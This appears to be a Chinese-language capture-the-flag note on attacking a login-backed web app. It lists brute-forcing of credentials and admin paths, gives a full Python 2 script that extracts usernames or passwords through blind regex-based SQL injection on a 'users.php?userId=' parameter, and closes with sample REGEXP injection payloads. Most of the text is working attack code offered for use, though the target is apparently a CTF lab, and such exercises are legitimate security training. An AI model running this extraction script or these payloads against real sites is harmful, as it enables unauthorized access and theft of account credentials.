1、burp爆破用户名密码 2、id,userid,useId多试几次 3、爆破后台目录,index.php,users.php,login.php,flag.php 4、脚本:
# -*- coding:utf-8 -*- import httplib import re import urllib class Attacker: def __init__(self, mode, url): self.url = url self.domin = self.get_domin() self.mode = mode str1 = [] for i in range(26): str1.append(chr(ord('a') + i)) for i in range(26): str1.append(chr(ord('A') + i)) for i in range(10): str1.append(chr(ord('0') + i)) self.str_box = str1 def get_domin(self): url = self.url url_a = url.split('://') if re.match('^http',url_a[0]): url = url_a[1] else: url = url_a[0] url_a = url.split('/') domin = url_a[0] return domin def crack(self): conn = httplib.HTTPConnection(self.domin) if self.mode == 1: aim = 'username' if self.mode == 2: aim = 'password' url = self.url attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'') attack_url2 = urllib.quote('\' #') str_box = self.str_box try: string = '^' while True: for str_end in str_box: url_to_attack = url + attack_url1 + string + str_end + attack_url2 #print url_to_attack conn.request(method="GET", url=url_to_attack) response = conn.getresponse() res = response.read() if res.find('useless') > 0: string = string + str_end str_end = -1 print string[1:] #如果想看到破进程,取消此段注释 break if str_end != -1 and str_end == '9': break self.name = string print self.name[1:] except: print "Something Wrong" print url def main(): attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2' attacker = Attacker(2, attack_url) #1为用户名注入,2为密码注入 attacker.crack() if __name__ == '__main__': main()正则注入
userId=2' or username REGEXP '^A' # userId=2' or username REGEXP '^a' # userId=2' or username REGEXP '^Z' #